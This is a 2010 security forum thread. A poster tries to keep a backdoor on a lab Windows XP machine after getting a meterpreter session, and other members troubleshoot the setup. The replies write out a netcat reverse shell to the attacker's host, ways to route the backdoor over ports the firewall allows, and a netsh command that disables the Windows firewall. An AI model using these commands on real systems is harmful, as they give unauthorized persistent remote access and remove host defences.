c0r Posted September 8, 2010 Posted September 8, 2010 (edited) I'm trying to create a backdoor on a virtual xp sp2 machine firewall enabled. I managed to get a meterpreter session on the machine. I tried to install metsvc but it fails to bind. Also i tried to install netcat and open a port using netsh command in windows. But the port doesnt open. Any other ideas? c ps:this is all practised in my virtual lab. Edited September 8, 2010 by c0r Quote
Infiltrator Posted September 8, 2010 Posted September 8, 2010 Hi C0R, In order to create a reverse shell with NetCat you will need to do the following: On your host, you have to listen for an incoming connection (thanks to -v, you'll get a quick note as soon as the shell connects): netcat -v -l -p 3333 On the remote host, the following command has to be executed in order to establish a connection to your host: netcat -e cmd.exe yourhost 3333 Try the above, if doesn't work let me know. Regards, Infiltrator Quote
c0r Posted September 8, 2010 Author Posted September 8, 2010 I tried this howto Persistent netcat backdoor but the firewall doenst allow the connection! c Quote
chikpee Posted September 8, 2010 Posted September 8, 2010 (edited) Are you trying port 455 (the one that tutorial you posted used as an example) or some other port? My first instinct is that the Win firewall is blocking any unused port by default. So you could either try to get your netcat backdoor to work over an allowed port (like 80, 8080, 443, etc.) or put a rule into the firewall to explicitly allow incoming/outgoing traffic on the port of your choice. I have the openBSD version of netcat (which is now the default version that Ubuntu comes with) and it won't let you use any of the first 1024 ports without root access. Not sure if the Win version is the same or not. Edited September 8, 2010 by chikpee Quote
c0r Posted September 8, 2010 Author Posted September 8, 2010 i'm trying the 455 port...yes...gonna try 4444 or something else...thx fot the hint! c Quote
Infiltrator Posted September 8, 2010 Posted September 8, 2010 I tried this howto Persistent netcat backdoor but the firewall doenst allow the connection! c That's kind of interesting, cause when I created a reverse shell with netcat on my VMs. I was able to get a reverse shell, even with the firewall turned on. May be you should try using the TCP ports mentioned (80, 443) Quote
chikpee Posted September 8, 2010 Posted September 8, 2010 While we're on the subject of netcat... ...anyone know why the openBSD version (as I said above, now also the standard version packaged with Ubuntu) dropped the "-e" option? Quote
hexophrenic Posted September 9, 2010 Posted September 9, 2010 I'm trying to create a backdoor on a virtual xp sp2 machine firewall enabled. I managed to get a meterpreter session on the machine. I tried to install metsvc but it fails to bind. Also i tried to install netcat and open a port using netsh command in windows. But the port doesnt open. Any other ideas? c ps:this is all practised in my virtual lab. Use netsh from cli. A quick google produced: http://www.windowsnetworking.com/articles_...s-Firewall.html Quote
c0r Posted September 9, 2010 Author Posted September 9, 2010 @ hexophrenic : tried the netsh command...did not work.If you look at the Metasploit unleashed howto you will see they use the netsh command. @Infiltrator : so your saying it works!I'll have another go then... c Quote
hexophrenic Posted September 9, 2010 Posted September 9, 2010 netsh firewall set opmode mode=DISABLE will disable the firewall. you can entirely control (assuming GP is absent) the firewall via CLI with appropriate local privs, or with GP is DA rights are available. what error message did you get? Quote
c0r Posted September 9, 2010 Author Posted September 9, 2010 (edited) None...that's the wierd part... I'm trying it out on a new installed xp sp2 now. Oke...i'm trying this on a fresh xp sp2 version. I don't get any errors,the firewall adds the exceptions without any problem. But when i try to connect with netcat to port 139 it times out. nc -v 192.168.1.102 139 192.168.1.102: inverse host lookup failed: Unknown server error : Connection timed out (UNKNOWN) [192.168.1.102] 139 (netbios-ssn) open In the windows machine i see the connection TCP 192.168.1.102:139 192.168.1.106:44169 ESTABLISHED for a short time...times out. any ideas? c Edited September 9, 2010 by c0r Quote
Infiltrator Posted September 10, 2010 Posted September 10, 2010 (edited) None...that's the wierd part... I'm trying it out on a new installed xp sp2 now. Oke...i'm trying this on a fresh xp sp2 version. I don't get any errors,the firewall adds the exceptions without any problem. But when i try to connect with netcat to port 139 it times out. nc -v 192.168.1.102 139 192.168.1.102: inverse host lookup failed: Unknown server error : Connection timed out (UNKNOWN) [192.168.1.102] 139 (netbios-ssn) open In the windows machine i see the connection TCP 192.168.1.102:139 192.168.1.106:44169 ESTABLISHED for a short time...times out. any ideas? c What you need to ensure, is that you have one shell listening for incoming connections and the other shell making the outbound connection. So on the computer that, you wish to turn off the monitor. It should be making connection out. And on the computer, where you are going to remotely control it, have it set to listen. If else fails, watch this video Edited September 10, 2010 by Infiltrator Quote
c0r Posted September 13, 2010 Author Posted September 13, 2010 Got it to work.Thx for the tips! After the meterpreter session i disabled the windows firewall then installed metsvc. Also installing netcat worked. c Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.